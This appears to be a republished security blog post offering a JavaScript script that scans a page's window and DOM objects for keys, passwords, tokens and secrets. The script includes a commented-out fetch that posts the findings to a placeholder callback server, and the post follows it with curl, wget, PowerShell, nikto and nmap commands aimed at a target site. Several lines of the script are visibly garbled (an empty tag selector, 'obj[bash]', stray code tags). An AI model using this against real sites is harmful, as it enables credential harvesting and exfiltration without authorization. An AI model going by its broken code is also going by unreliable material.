Listen to this Post
The article discusses a JavaScript script that can be used to scan the DOM for custom objects, particularly useful for security researchers and penetration testers. The script searches for sensitive information like keys, passwords, and authentication tokens stored in JavaScript objects.
You Should Know:
Here’s a modified version of the script with practical implementation details:
// DOM Digging Script for Sensitive Data
const sensitiveTerms = [
'key', 'password', 'auth', 'token', 'secret',
'api', 'credential', 'login', 'session', 'private'
];
function scanDOMForSensitiveData() {
const allElements = document.getElementsByTagName('');
const results = [];
// Recursive function to scan object properties
function scanObject(obj, path = '') {
if (obj === null || typeof obj !== 'object') return;
try {
for (const prop in obj) {
if (obj.hasOwnProperty(prop)) {
const fullPath = path ? `${path}.${prop}` : prop;
const value = obj[bash];
// Check if property name contains sensitive terms
const isSensitive = sensitiveTerms.some(term =>
prop.toLowerCase().includes(term.toLowerCase())
);
if (isSensitive) {
results.push({
path: fullPath,
value: value,
type: typeof value
});
}
// Recursively scan nested objects
if (typeof value === 'object' && value !== null) {
scanObject(value, fullPath);
}
}
}
} catch (e) {
console.error(<code>Error scanning: ${path}</code>, e);
}
}
// Scan global objects
scanObject(window, 'window');
// Scan all DOM elements
Array.from(allElements).forEach(element => {
try {
scanObject(element, <code>element.${element.tagName}</code>);
} catch (e) {
console.error(<code>Error scanning element: ${element.tagName}</code>, e);
}
});
return results;
}
// Execute and display results
const findings = scanDOMForSensitiveData();
console.table(findings);
// Optional: Post results to callback server
// fetch('https://your-callback-server.com/log', {
// method: 'POST',
// body: JSON.stringify(findings),
// headers: { 'Content-Type': 'application/json' }
// });
Linux Commands for Web Security Analysis:
Use curl to analyze JavaScript files curl -s https://target-site.com/main.js | grep -iE 'key|password|auth|token|secret' Use wget to download all JS files for offline analysis wget --recursive --no-parent --accept js https://target-site.com/ Analyze with grep grep -r -i -E 'key|password|auth|token|secret' downloaded_files/ Use Browser Developer Tools from command line google-chrome --headless --disable-gpu --dump-dom https://target-site.com > dom_dump.html
Windows PowerShell Commands for DOM Analysis:
Download webpage content
Invoke-WebRequest -Uri "https://target-site.com" -OutFile page.html
Search for sensitive patterns
Select-String -Path "page.html" -Pattern "key|password|auth|token|secret" -CaseSensitive $false
Analyze JavaScript files
$jsFiles = Get-ChildItem -Recurse -Include .js
foreach ($file in $jsFiles) {
Get-Content $file | Select-String -Pattern "key|password|auth|token|secret"
}
What Undercode Say:
DOM analysis is a critical skill for modern web security professionals. The script provided offers a foundation for identifying sensitive data leakage in client-side code. For comprehensive security analysis, combine this with:
Use Burp Suite or OWASP ZAP for proxy analysis zap.sh -cmd -quickurl https://target-site.com -quickout report.html Use Nikto for vulnerability scanning nikto -h https://target-site.com -output nikto_results.txt Use Nmap for service enumeration nmap -sV --script=http-dom-xss,http-sql-injection target-site.com
Remember to always get proper authorization before testing any website. Ethical hacking requires permission.
Expected Output:
The script will output a table in the browser console showing all detected sensitive data structures in the DOM, including their location paths and values. For more advanced analysis, consider integrating with tools like Burp Suite or OWASP ZAP.
IT/Security Reporter URL:
Reported By: Https: – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
